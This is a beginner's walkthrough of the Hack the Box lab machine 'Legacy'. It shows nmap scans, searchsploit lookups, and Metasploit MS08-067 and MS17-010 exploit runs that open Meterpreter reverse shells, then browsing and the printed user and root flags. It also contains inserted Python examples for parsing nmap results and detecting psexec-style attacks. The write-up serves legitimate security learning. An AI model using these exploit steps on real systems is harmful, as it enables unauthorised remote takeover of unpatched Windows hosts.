
Machine #3 <Hack the Box> Legacy -Walkthrough-

Posted at 2020-09-01

About me

A complete beginner at Hack the Box.
I started because it was recommended as a place to test what I had learned after finishing Hacking Lab.

These are notes for myself, but I would be grateful for any corrections or suggestions for improvement.

Machine

This time the machine is Legacy.
I chose it because I wanted to work through it following @v_avenger's "DEF CON 28: Red Team Village: Building a Guerrilla Red Team to Rout Adversaries".

[Image: Legacy.png]

nmap

First, check which ports are open with nmap.

root@kali:~# nmap -A -Pn 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:55 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h31m37s, deviation: 2h07m16s, median: 4d23h01m37s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:14:10 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-09-06T23:57:46+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)                                                                                                                                                                                                           
HOP RTT       ADDRESS
1   250.81 ms 10.10.14.1
2   251.14 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.10 seconds

The familiar port numbers 139 and 445 showed up.
They are the ports Samba uses, so I guessed this would probably be done with Metasploit.

I looked into the vulnerabilities.

root@kali:~# nmap -Pn -script smb-vuln* -p 139 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 04:10 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

VULNERABLE was displayed, showing that the host has the ms08-067 and ms17-010 vulnerabilities.
I was curious whether changing the port would make any difference, but there was no particular change between 139 and 445.

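The nmap `smb-vuln*` output above mixes three kinds of result (VULNERABLE, `false`, and a script ERROR) in one indented tree, which is easy to misread by eye when scanning more than one host. The following parser is an added example, not part of the original post or of nmap; it takes the host-script text (a trimmed excerpt of the scan output above, embedded inline) and returns one structured finding per script with its state, title, CVE identifiers, risk factor and disclosure date, so the VULNERABLE entries can be pulled out for patch triage. The `Finding` class and the function names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Trimmed excerpt of the `nmap --script smb-vuln*` host-script output shown above.
SCAN_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|     Disclosure date: 2008-10-23
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

SCRIPT_RE = re.compile(r"^(smb-vuln-[\w-]+):\s*(.*)$")
FIELD_RE = re.compile(r"^(State|IDs|Risk factor|Disclosure date):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Finding:
    script: str
    state: str                      # VULNERABLE, NOT VULNERABLE, ERROR, ...
    title: Optional[str] = None
    cves: List[str] = field(default_factory=list)
    risk: Optional[str] = None
    disclosed: Optional[str] = None


def _strip_margin(raw: str) -> str:
    """Drop nmap's '| ' / '|_' tree margin and surrounding whitespace."""
    return raw.lstrip().lstrip("|_").strip()


def parse_smb_vuln(text: str) -> List[Finding]:
    """Turn the host-script block into one Finding per smb-vuln-* script."""
    findings: List[Finding] = []
    current: Optional[Finding] = None
    for raw in text.splitlines():
        line = _strip_margin(raw)
        if not line:
            continue
        m = SCRIPT_RE.match(line)
        if m:
            name, rest = m.groups()
            # One-line results carry their verdict on the script line itself.
            if rest == "false":
                current = Finding(name, "NOT VULNERABLE")
            elif rest.startswith("ERROR"):
                current = Finding(name, "ERROR")
            else:
                current = Finding(name, "UNKNOWN")   # refined by a later "State:" line
            findings.append(current)
            continue
        if current is None:
            continue
        f = FIELD_RE.match(line)
        if f:
            key, value = f.groups()
            if key == "State":
                current.state = value
            elif key == "IDs":
                current.cves.extend(CVE_RE.findall(value))
            elif key == "Risk factor":
                current.risk = value
            elif key == "Disclosure date":
                current.disclosed = value
        elif current.title is None and not line.endswith(":"):
            # First free-text line after the "VULNERABLE:" header is the title.
            current.title = line
    return findings


def vulnerable_cves(findings: List[Finding]) -> List[str]:
    """CVE identifiers of every finding nmap marked VULNERABLE or LIKELY VULNERABLE."""
    return sorted({c for f in findings
                   if f.state.upper().startswith(("VULNERABLE", "LIKELY VULNERABLE"))
                   for c in f.cves})


if __name__ == "__main__":
    for fnd in parse_smb_vuln(SCAN_OUTPUT):
        print(f"{fnd.script:<20} {fnd.state:<16} {', '.join(fnd.cves)}")
    print("patch priority:", vulnerable_cves(SCAN_OUTPUT and parse_smb_vuln(SCAN_OUTPUT)))
```

The ERROR entry (ms10-061) is kept as its own state rather than dropped, because a script that failed to run says nothing about whether the host is patched and should be re-checked rather than treated as clean. Both CVEs it extracts here were fixed by the MS08-067 and MS17-010 updates, and on a host that can no longer be patched the mitigation is to disable SMBv1 and block 139/445 from untrusted networks.
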
ms08-067

root@kali:~# searchsploit ms08-067
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)                                                                                                                                    | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                                                                                                                                                     | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                                                                                                                                               | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)                                                                                                                | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                                                                                                                                           | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                                                                                                                                           | windows/remote/7132.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

searchsploit showed that Metasploit can be used.

msf5 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.9:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.9:4444 -> 10.10.10.4:1033) at 2020-09-02 04:42:00 +0900

A shell came back successfully.

ms17-010

I think I did this on a different machine before, but since I am here I will try it on this one too.


root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                                                                                | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                                                                            | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                                         | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                     | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                               | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                                                                            | windows_x86-64/remote/41987.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Metasploit can be used for this vulnerability as well, so I will use it.

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

msf5 > use 4
msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81e5c1d0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... EoQoquDI.exe
[*] 10.10.10.4:445 - Created \EoQoquDI.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \EoQoquDI.exe...
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2020-08-03 20:44:35 +0900

This one also returned a shell successfully.

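The ms17_010_psexec output above shows what the attack leaves behind on the host: an executable with a random eight-letter name uploaded to the share root, a service started to run it, and the file deleted a few seconds later. That sequence is what a defender can alert on. The following detector is an added example, not part of the original post or of Metasploit: it runs over a constructed list of event records (a System-log 7045 "service was installed" event for a benign service, a 7045 for a service whose binary sits at the drive root, and a Sysmon Event ID 23 FileDelete for that binary) and flags service installs that combine two or more of three signals: binary at a drive or share root, random-looking service or binary name, and binary deleted shortly after the service was installed. The payload file name is the one printed above; the service name `gHtRwXqL`, the timestamps and the record layout are constructed, and the case-flip heuristic in `looks_random` is a crude approximation of my own.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample telemetry (not from the page). The payload file name is the one the
# module printed above; the service name, times and record layout are made up.
EVENTS: List[Dict] = [
    {"source": "System", "event_id": 7045, "time": "2020-09-02T04:30:00",
     "service_name": "Spooler", "image_path": r"C:\WINDOWS\system32\spoolsv.exe"},
    {"source": "System", "event_id": 7045, "time": "2020-09-02T04:41:58",
     "service_name": "gHtRwXqL", "image_path": r"C:\EoQoquDI.exe"},
    {"source": "Sysmon", "event_id": 23, "time": "2020-09-02T04:42:03",
     "target_filename": r"C:\EoQoquDI.exe"},
]

# An .exe directly under a drive root ("C:\x.exe"), a bare root ("\x.exe") or a share
# root ("\\HOST\ADMIN$\x.exe"). Legitimate services almost never install there.
ROOT_EXE_RE = re.compile(r'^(?:[A-Za-z]:|\\\\[^\\]+\\[^\\]+)?\\[^\\]+\.exe$', re.IGNORECASE)


def first_token(image_path: str) -> str:
    """Executable part of an ImagePath, with quotes and arguments removed."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return image_path[1:].split('"', 1)[0]
    return image_path.split(" ", 1)[0]


def is_root_level_exe(image_path: str) -> bool:
    return ROOT_EXE_RE.match(first_token(image_path)) is not None


def looks_random(name: str) -> bool:
    """Crude heuristic: letters only, with many upper/lower case flips (e.g. EoQoquDI)."""
    if not re.fullmatch(r"[A-Za-z]{6,16}", name):
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 4


def detect_short_lived_root_services(events: List[Dict],
                                     delete_window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """Return an alert for each 7045 install that matches at least two of the three signals."""
    installs = [e for e in events if e["source"] == "System" and e["event_id"] == 7045]
    deletes = [e for e in events if e["source"] == "Sysmon" and e["event_id"] == 23]
    alerts = []
    for svc in installs:
        exe = first_token(svc["image_path"])
        base = exe.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        reasons = []
        if is_root_level_exe(exe):
            reasons.append("service binary at a drive or share root")
        if looks_random(base) or looks_random(svc["service_name"]):
            reasons.append("random-looking service or binary name")
        installed_at = datetime.fromisoformat(svc["time"])
        for d in deletes:
            deleted_at = datetime.fromisoformat(d["time"])
            if (d["target_filename"].lower() == exe.lower()
                    and timedelta(0) <= deleted_at - installed_at <= delete_window):
                secs = int((deleted_at - installed_at).total_seconds())
                reasons.append(f"binary deleted {secs}s after install")
                break
        if len(reasons) >= 2:
            alerts.append({"service_name": svc["service_name"], "image_path": exe, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_short_lived_root_services(EVENTS):
        print(alert["service_name"], alert["image_path"])
        for r in alert["reasons"]:
            print("  -", r)
```

Requiring two signals keeps a single odd-looking service name from paging anyone, while the root-path plus quick-delete combination is specific enough to be worth an alert on its own. Note that this only covers the psexec-style path; the ms08_067_netapi run earlier in the post goes through the Server service RPC interface and creates no service or file, so for that one the practical controls are the patch, blocking 139/445 at the network edge, and the nmap check shown above.
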
user

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd /
meterpreter > dir
Listing: C:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
100777/rwxrwxrwx    0                  fil   2017-03-16 14:30:44 +0900        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 14:30:44 +0900        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 14:20:29 +0900        Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 14:30:44 +0900        IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 14:30:44 +0900        MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-14 05:13:04 +0900        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 14:20:57 +0900        Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 14:20:30 +0900        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 14:18:34 +0900        WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 14:20:02 +0900        boot.ini
100444/r--r--r--    250048             fil   2008-04-14 07:01:44 +0900        ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-16 12:18:24 +0900  pagefile.sys
meterpreter > cd Documents\ and\ Settings 
meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 15:07:20 +0900  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:52 +0900  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:42 +0900  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 14:33:41 +0900  john

meterpreter > cd john
meterpreter > dir
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 14:33:41 +0900  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 14:33:41 +0900  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 14:33:42 +0900  ntuser.ini

meterpreter > cd Desktop 
meterpreter > dir
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:19:32 +0900  user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f

root

meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 15:07:20 +0900  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:52 +0900  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:42 +0900  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 14:33:41 +0900  john
meterpreter > cd Administrator 
meterpreter > dir
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 15:07:20 +0900  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 15:07:20 +0900  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 15:07:21 +0900  ntuser.ini

meterpreter > cd Desktop 
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:18:19 +0900  root.txt

meterpreter > cat root.txt 
993442d258b0e0ec917cae9e695d5713

Questions

- In the ms17-010 part, after searching in Metasploit I was confused about which module to use.
  How are you supposed to tell them apart?

When I checked Exploit DB, only the one corresponding to Metasploit module number 4 was listed.
Module types

Thoughts

This was my third machine.
It is not for me to say, but I think being able to infer things from the port numbers is one way I have grown.

Still, I was only able to beat this one because I had done Lame and Blue; a different kind of machine would probably give me a hard time.
I want to keep at it.
As points to reflect on, I felt it was bad that after getting the shell I did not check my privileges and did not look at Exploit DB.

Thank you for reading this clumsy article to the end.
